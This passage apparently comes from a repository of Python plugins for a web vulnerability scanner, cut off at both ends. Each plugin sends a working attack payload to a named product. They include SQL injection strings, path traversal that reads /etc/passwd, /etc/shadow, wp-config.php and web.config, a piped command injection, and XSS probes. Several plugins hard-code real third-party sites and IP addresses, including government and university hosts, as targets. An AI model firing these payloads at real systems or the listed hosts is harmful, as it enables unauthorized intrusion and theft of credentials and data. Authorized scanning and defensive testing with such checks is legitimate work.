12 |     url=arg+"MessageBoard/Default.aspx?hidIsreply=DefaultModule1%24rbIsReply&DefaultModule1%24txtKey=%%27+and+(select%20char(64)%2B@@version)>0%20and%2B%27%%27=%27"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==500 and "@Microsoft" in res:
15 |         security_hole(url)
16 | 
17 | if __name__=="__main__":
18 |     from dummy import *
19 |     audit(assign('mainone_b2b','http://www.semi-chip.com/')[1])


--------------------------------------------------------------------------------
/plugins/niubicms/478.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service,arg):
 5 |     if service == "niubicms":
 6 |     	return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "/wap/?action=show&mod=admin%20where%20userid=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%281,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--"
10 | 	code, head, res, errcode,finalurl =  curl.curl("\"%s\"" % (arg + payload))
11 | 
12 | 	if code == 200:
13 | 		if "for key 'group_key'" in res:
14 | 			security_hole('find sql injection: ' + arg+payload)
15 | 
16 | if __name__ == "__main__":
17 | 	from dummy import *
18 | 	audit(assign('niubicms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/seentech_uccenter/1847.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0123369
 4 | 
 5 | def assign(service, arg):
 6 |     if service == 'seentech_uccenter':
 7 |         return True, arg
 8 |         
 9 | def audit(arg):
10 |     payload1 = "ucenter/remotewh/sendcmd_start.php?gAbsoultPath=x | cat /etc/passwd > a.txt | "
11 |     payload2 = "ucenter/remotewh/a.txt"
12 |     curl.curl2(arg+payload1)
13 |     code,_,res,_,_ = curl.curl2(arg+payload2)
14 |     if code==200 and 'root:/bin/bash' in res :
15 |         security_hole(arg+payload2)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('seentech_uccenter', 'https://60.223.226.154/')[1])


--------------------------------------------------------------------------------
/plugins/skytech/2708.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #南京擎天政务系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-081902
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "skytech":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'admin/sysconfig_reg_page.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'txtUserRights' in res and "txtTitle" in res:
17 |         security_info(verify_url)
18 |         security_info(url + payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('skytech','http://58.222.211.21/')[1])


--------------------------------------------------------------------------------
/plugins/skytech/2709.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #南京擎天政务系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-081902
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "skytech":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'admin/effectdate_reg_page.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'PostBack' in res and "txtFlag" in res:
17 |         security_info(verify_url)
18 |         security_info(url + payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('skytech','http://58.222.211.21/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/skytech/2713.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #南京擎天政务系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-081902
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "skytech":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'admin/biz_login_log_page.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'PostBack' in res and "trimedText" in res:
17 |         security_info(verify_url)
18 |         security_info(url + payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('skytech','http://58.222.211.21/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/686_weixin/1633.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #title:686 weixin CPS system SQL injection
 4 | #author: Jewer
 5 | #inurl:regist.php?invite=
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "686_weixin":
 9 |         return True, arg
10 | def audit(arg):
11 |     payload = "login/regist.php?invite=-4325%20and%201=2%20union%20select+1,md5(123),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23"
12 |     url = arg + payload
13 |     code, head,res, errcode, _url = curl.curl2(url)
14 |     if code==200 and '202cb962ac59075b964b07152d234b70' in res:
15 |         security_hole(url)
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('686_weixin', 'http://www.ylf8888.com/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/118.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Seay'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "discuz":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     _, head, body, _, _ = curl.curl(url + '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23')
12 |     if body and body.find('c4ca4238a0b923820dcc509a6f75849b1') != -1:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('discuz', 'http://www.cnseay.com/')[1])


--------------------------------------------------------------------------------
/plugins/drupal/1185.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = '0xAE' 
 4 | #_name_ = ' drupal full path disclousure'
 5 | import re
 6 | def assign(service, arg): 
 7 |     if service == "drupal": 
 8 |         return True, arg 
 9 | 
10 | def audit(arg):
11 |     payload='?q[]=x'
12 |     verify_url = arg + payload
13 |     pathinfo = re.compile(r' in <b>(.*)</b> on line')
14 |     code, body,res, errcode, _ = curl.curl2(verify_url)
15 |     match = pathinfo.search(body)
16 |     if code == 200 and match:
17 |         security_info('drupal full path disclousure vulnerability',verify_url)
18 | 
19 | if __name__ == '__main__': 
20 |     from dummy import * 
21 |     audit(assign('drupal', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/easethink/1238.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 01001000entai
 4 | #_PlugName_ = easethink_cookie_sqli
 5 | 
 6 | def assign(service, arg):
 7 | 	if service == 'easethink':
 8 | 		return True, arg
 9 | 
10 | def audit(arg):
11 |     #No.1 http://www.wooyun.org/bugs/wooyun-2010-072094
12 |     payload = "index.php"
13 |     target = arg + payload
14 |     code, head, body, errcode, final_url = curl.curl2(target,cookie='sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))');
15 |     if 'c4ca4238a0b923820dcc509a6f75849' in body:
16 |         security_hole(target)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('easethink', 'http://demo.easethink.com/t1/')[1])
21 | 


--------------------------------------------------------------------------------
/plugins/fangweituangou/488.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service,arg):
 5 |     if service == "fangweituangou":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "index.php?m=Article&a=showByUname&uname=a%27and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
10 | 	code, head, res, errcode,finalurl =  curl.curl("\"%s\"" % (arg + payload))
11 | 
12 | 	if code == 200:
13 | 		if "for key 'group_key'" in res:
14 | 			security_hole('find sql injection: ' + arg+'index.php')
15 | 
16 | if __name__ == "__main__":
17 | 	from dummy import *
18 | 	audit(assign('fangweituangou', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/qibocms/321.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = LinE
 4 | #_PlugName_ = QiboCMS V7 Arbitrary File Download
 5 | #_Function_ = QiboCMS V7 任意文件下载漏洞
 6 | #_FileName_ = QiboCMS_Arbitrary_File_Download.py
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "qibocms":
10 |         return True, arg 
11 | 
12 | def audit(arg):
13 |     payload = 'do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8'
14 |     target = arg + payload
15 |     code, head, res, errcode, _ = curl.curl(target)
16 |     if code == 200 and "webdb\['mymd5'\]" in res:
17 |         security_hole(target)
18 | 
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('qibocms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/shadows-it/2462.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:Shadows-IT Designs Local File Inclusion
 4 | #Refer:https://www.bugscan.net/#!/x/2042
 5 | #Author:烽火戏诸侯
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'shadows-it':
 9 |         return True, arg
10 |     
11 | def audit(arg):
12 |     payload ='admin/selector.php?page=dXBsb2FkX2ZpbGU=&op=ZHJhd19jYXRfcGhvdG8=&id=Li4vLi4vaW5kZXgucGhw'
13 |     target=arg+payload
14 |     code, head, res, errcode, _ = curl.curl2(target) 
15 |     if code == 200 and '$DB_site' in res:
16 |         security_hole('LFI:'+target)
17 |     
18 |         
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('shadows-it','http://www.ekhaa.org.sa/')[1])


--------------------------------------------------------------------------------
/plugins/skytech/2711.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #南京擎天政务系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-081902
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "skytech":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'transdata/transdata_outtoin_page.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'STYLE1' in res and "GENERATOR" in res:
17 |         security_info(verify_url)
18 |         security_info(url + payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('skytech','http://58.222.211.21/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/skytech/2716.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #南京擎天政务系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-081902
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "skytech":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'stat/case_count_list_page.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'YearMonthDay' in res and "legend" in res:
17 |         security_info(verify_url)
18 |         security_info(url + payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('skytech','http://58.222.211.21/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/tcexam/2717.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:TCExam重新安装可getshell漏洞
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2013-046974
 6 | 
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="tcexam":
10 |         return True,arg 
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"install/install.php"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and 'db_user' in res and 'db_password' in res:
17 |         security_hole(url)
18 | if __name__=="__main__":
19 |     from dummy import *
20 |     audit(assign('tcexam','http://210.44.48.41:8080/')[1])
21 |     audit(assign('tcexam','http://www.robotpartner.cn/')[1])
22 |     audit(assign('tcexam','http://61.54.213.12:86/exam/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/391.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | import re
 4 | 
 5 | '''
 6 | 某些wordpress主题存在任意文件下载漏洞
 7 | 可以下载到配置文件
 8 | '''
 9 | def assign(service, arg):
10 |     if service == "wordpress":
11 |         return True, arg
12 | 
13 | def audit(arg):
14 |     url = arg
15 |     path = 'wp-admin/admin-ajax.php'
16 |     payload='?action=kbslider_show_image&img=../wp-config.php'
17 |     
18 |     code, head, res, errcode, _ = curl.curl(url + path+ payload)
19 |     if code == 200:
20 |         m = re.search('DB_PASSWORD', res)
21 |         if m:
22 |             security_info(res)
23 |             
24 | if __name__ == "__main__":
25 |     from dummy import *
26 |     audit(assign('wordpress', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/278.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'K0thony'
 4 | # Discuz! JiangHu plugin versions 1.1 and below remote SQL injection
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "discuz":
 9 |         return True, arg
10 | 
11 | 
12 | def audit(arg):
13 |     payload = 'forummission.php?index=show&id=24%20and+1=2+union+select+1,2,md5(12345),4,5,6,7,8,9,10,11--'
14 |     verify_url = arg + payload
15 |     code, head, res, errcode, _ = curl.curl(verify_url)
16 |     if code == 200 and "827ccb0eea8a706c4c34a16891f84e7b1" in res:
17 |         security_hole(verify_url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('discuz','http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/ecscms/1363.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #ref http://wooyun.org/bugs/wooyun-2014-077491
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "ecscms":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27%20and%201=db_name%281%29--&st=1&t=1'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 500 and 'master' in res and 'nvarchar' in res and 'int' in res:
16 |         security_hole(url)
17 |                         
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('ecscms', 'http://www.zjhzyg.net/')[1])


--------------------------------------------------------------------------------
/plugins/ecshop/482.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "ecshop":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg + "delete_cart_goods.php"
10 |     payload = "id=1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)"
11 |     code, head, res, errcode,finalurl =  curl.curl(url + " -d '" + payload +"'")
12 |     
13 |     if code == 200:
14 |         if res.find("for key 'group_key'") != -1:
15 |             security_hole('find sql injection: ' + url)
16 |             
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('ecshop', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/gxwssb/2748.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:天津神州助平台通用型任意下载
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-087767
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="gxwssb":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
12 |     url=arg+"gxwssb/fileDownloadmodel?name=../WEB-INF/web.xml"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==200 and "filter-name" in res:
15 |         security_hole(url)
16 |     
17 | 
18 | if __name__=="__main__":
19 |     from dummy import *
20 |     audit(assign('gxwssb','http://fin.hrbnu.edu.cn:8080/')[1])
21 |     audit(assign('gxwssb','http://wssb.muc.edu.cn/')[1])
22 |     audit(assign('gxwssb','http://210.36.48.93:8080/')[1])


--------------------------------------------------------------------------------
/plugins/heeroa/347.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'angel'
 4 | #refer :http://www.wooyun.org/bugs/wooyun-2014-058386
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "heeroa":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg + "/info/infoShowAction.do?accessory=%3f%3f%a1%c0%a8%ba%a1%a4%3f%3f%3f.xls&id=../../../../../../../../../../etc/passwd%00.jpg&method=getAccessory"
12 |     code, head, res, errcode,finalurl =  curl.curl(url)
13 |     if res.find('root:x:0:0:root') != -1 :
14 |         security_hole('Local File download vulnerability:' + url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('heeroa', 'http://www.example.com')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/ip/749.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | """
 4 | POC Name  : elasticsearch river 未授权访问
 5 | Author    : a
 6 | mail      :a@lcx.cc
 7 | Referer   :http://zone.wooyun.org/content/20297
 8 | elasticsearch在安装了river之后可以同步多种数据库数据
 9 | """
10 | def assign(service, arg):
11 |     if service == "ip":
12 |         return True, arg
13 | 
14 | def audit(arg):
15 |     payload = '/_river/_search'
16 |     url = 'http://' +arg + ':9200' + payload
17 |     code, head, res, errcode, _ = curl.curl('"%s"' % url)
18 |     if code == 200 and '_river' in res and 'type' in res:
19 |         security_hole(url)
20 |        
21 | 
22 | if __name__ == '__main__':
23 |     from dummy import *
24 |     audit(assign('ip', '173.164.160.131')[1])
25 | 


--------------------------------------------------------------------------------
/plugins/landray/2744.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*
 3 | # 蓝凌EIS智慧协同平台3处SQL注入
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == 'landray':
 8 |         return True, arg
 9 |         
10 | def audit(arg):
11 | 
12 |     url=arg+'sm/menu_left_edit.aspx'
13 |     post="action=dragdrop&id=1&parent_id=1%20where%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123%27)))--"
14 |     code,_,res,_,_ = curl.curl2(url,post)
15 |     if code!=0 and '202cb962ac59075b964b07152d234b70' in res:
16 |         security_hole(url)
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('landray','http://oa.hejiangroup.com/')[1])
20 |     # audit(assign('landray','http://oa.geheng.com:800/')[1])


--------------------------------------------------------------------------------
/plugins/ng-ags/1271.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | """
 5 | _POC Name_  :  NS-AGS /commonplugin-Download.php 任意文件下载漏洞
 6 | _References_:  http://wooyun.org/bugs/wooyun-2014-058838
 7 | _Author_    :   相守
 8 | """
 9 | def assign(service, arg):
10 |     if service == "ng-ags":
11 |         return True, arg
12 | 
13 | def audit(arg):
14 |     url = arg
15 |     payload='commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow'
16 |     code, head, res, errcode, _ = curl.curl(url +payload )
17 |     if code == 200  and "nobody" in res:
18 |             security_hole(url+payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('ng-ags', 'https://121.28.81.124/')[1])


--------------------------------------------------------------------------------
/plugins/phpcms/899.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*-
 3 | # Author     : 果果
 4 | # PlugName   : PHPCMS 搜索跨站脚本漏洞
 5 | # References : http://sebug.net/vuldb/ssvid-19058
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "phpcms" :
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg 
13 |     payload = "search/?type=%22%3E%3Cscript%3ealert(1234567890)%3c%2fscript%3e&q=rose&s=%CB%D1%CB%F7"
14 |     url += payload 
15 |     code, head, res, errcode, final_url = curl.curl(url)
16 |     if code == 200 and "<script>alert(1234567890)</script>" in res:
17 |         security_info(url) 
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('phpcms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/pstar/2734.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:xq17
 4 | #ref::http://www.wooyun.org/bugs/wooyun-2015-0128182
 5 | 
 6 | def assign(service,arg):
 7 |     if service=="pstar":
 8 |         return True,arg
 9 |     
10 | def audit(arg):
11 |     payload = "HyperLink/isfLclInfo.aspx?type=A&no="
12 |     url=arg + payload + '%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--'
13 |     code, head, res, errcode,finalurl =  curl.curl(url)
14 |     if code !=0 and "81dc9bdb52d04dc20036dbd8313ed055" in res:
15 |         security_hole('find sql injection: ' + arg + payload)
16 | 
17 | 
18 | if  __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign("pstar","http://180.166.7.114:8888/")[1])


--------------------------------------------------------------------------------
/plugins/pstar/2735.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:xq17
 4 | #ref::http://www.wooyun.org/bugs/wooyun-2015-0128182
 5 | 
 6 | def assign(service,arg):
 7 |     if service=="pstar":
 8 |         return True,arg
 9 |     
10 | def audit(arg):
11 |     payload = "HyperLink/qcustoms.aspx?type=A&no="
12 |     url=arg + payload + '%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--'
13 |     code, head, res, errcode,finalurl =  curl.curl(url)
14 |     if code !=0 and "81dc9bdb52d04dc20036dbd8313ed055" in res:
15 |         security_hole('find sql injection: ' + arg + payload)
16 | 
17 | 
18 | if  __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign("pstar","http://180.166.7.114:8888/")[1])


--------------------------------------------------------------------------------
/plugins/www/683.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # Exploit Title: HttpFileServer 2.3.x Remote Command Execution
 3 | # Version: 2.3.x
 4 | # CVE : CVE-2014-6287
 5 | # EXP : /?search=%00{.exec|calc.}
 6 | import urlparse
 7 | def assign(service, arg):
 8 |     if service == 'www':
 9 |         arr = urlparse.urlparse(arg)
10 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
11 | 
12 | def audit(arg):
13 |     payload = "/?search=hfs"
14 |     url = arg + payload
15 |     code, head, res, errcode, _ = curl.curl(url)
16 |     if code == 200 and "HFS 2.3" in head and "HttpFileServer v2.3" in res:
17 |         security_hole(url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('www', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/www/806.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = DWBH
 4 | # __type__  = jboss 7未授权访问及弱口令检测
 5 | import urlparse
 6 | def assign(service, arg):
 7 |     if service != "www":
 8 |         return
 9 |     arr=urlparse.urlparse(arg)
10 |     return True, '%s://%s/' % (arr.scheme, arr.netloc)
11 | def audit(arg):
12 |     payload = "management"
13 |     target=arg+payload
14 |     code, head, body, errcode, _ = curl.curl(target)
15 |     if code == 200 and '.jboss.' in body:
16 |         security_hole(target)
17 |     if code ==401:
18 |         task_push('www-auth',target)
19 |     
20 |     
21 | if __name__ == '__main__':
22 |     from dummy import *
23 |     audit(assign('www','http://192.168.0.116:9990/')[1])
24 | 


--------------------------------------------------------------------------------
/plugins/www/cst.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding:utf-8 -*-
 3 | from re import search,I
 4 | 
 5 | 
 6 | def assign(service, arg):
 7 |     if service != "www":
 8 |         return
 9 |     return True, arg
10 | 
11 | def audit(arg):
12 |     # headers 
13 |     headers = {'Fuck':'hello_word'}
14 |     # send request 
15 |     try:
16 |         code, head, body, redirect, log = hackhttp.http(arg, headers=headers)
17 |     except:
18 |         return False
19 |     # 
20 |     regexp = r"hello_word"
21 |     if 'Fuck' in head or 'fuck' in head:
22 |         if search(regexp,head,I):
23 |             security_note('This site is vulnerabile to Cross Site Tracing (XST) at: %s'%(arg))
24 | 
25 | if __name__ == "__main__":
26 |     from dummy import *


--------------------------------------------------------------------------------
/plugins/xr_gatewayplatform/1393.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import re
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "xr_gatewayplatform":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payloads = ['msa/../../../../../../../../etc/passwd', '/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=test.txt+downLoadFile=../etc/passwd']
11 |     for payload in payloads: 
12 |         url = arg + payload
13 |         code, head, res, errcode, _ = curl.curl(url)
14 |         if code == 200 and 'root' in res and '/bin/bash' in res:
15 |                 security_warning(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('xr_gatewayplatform', 'http://112.16.141.6/')[1])


--------------------------------------------------------------------------------
/plugins/acsoft/2588.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name: 安财软件通用报销系统任意文件下载2
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0121651
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "acsoft":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "WS/WebServiceBase.asmx/GetXMLList"
12 |     data = "strXMLFileName=/../web.config "
13 |     code, head, res, errcode, _ = curl.curl2(payload,post=data)
14 |     if code ==200 and 'connectionStrings' in res and 'GlobalConnectionString' in res:
15 |          security_hole(payload+':Any reading' )
16 |          
17 | if __name__ == '__main__':
18 |         from dummy import *
19 |         audit(assign('acsoft','http://122.224.179.212:8000/')[1])


--------------------------------------------------------------------------------
/plugins/acsoft/2589.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name: 安财软件通用报销系统任意文件下载3
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0121651
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "acsoft":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "WS/WebService.asmx/GetFileContent"
12 |     data = "Content=1&fileName=web.config"
13 |     code, head, res, errcode, _ = curl.curl2(payload,post=data)
14 |     if code ==200 and 'connectionStrings' in res and 'GlobalConnectionString' in res:
15 |         security_hole(payload+':Any reading ' )
16 |          
17 | if __name__ == '__main__':
18 |         from dummy import *
19 |         audit(assign('acsoft','http://122.224.179.212:8000/')[1])


--------------------------------------------------------------------------------
/plugins/dalianqianhao/1060.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #Author:Little Nine
 3 | #BaiduHacking: inurl:ACTIONLOGON.APPPROCESS
 4 | #DaLianQianhao XSS
 5 | import re
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "dalianqianhao":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload=url+'ACTIONLOGON.APPPROCESS?mode=1&applicant=%22%3E%3Ch1%3EYourXSShere%3C/h1%3E'
14 |     code, head, res, errcode, _ = curl.curl(payload)
15 |     if code == 200 and "<h1>YourXSShere</h1>" in res:
16 |        security_info(payload)
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('dalianqianhao', 'http://jwk.dlvtc.edu.cn/')[1])
20 |     audit(assign('dalianqianhao', 'http://218.7.95.52:800/')[1])


--------------------------------------------------------------------------------
/plugins/lcecgap/2697.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:浪潮ECGAP政务审批系统SQL注入漏洞
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-075562
 6 | 
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="lcecgap":
10 |         return True,arg 
11 | 
12 | 
13 | def  audit(arg):
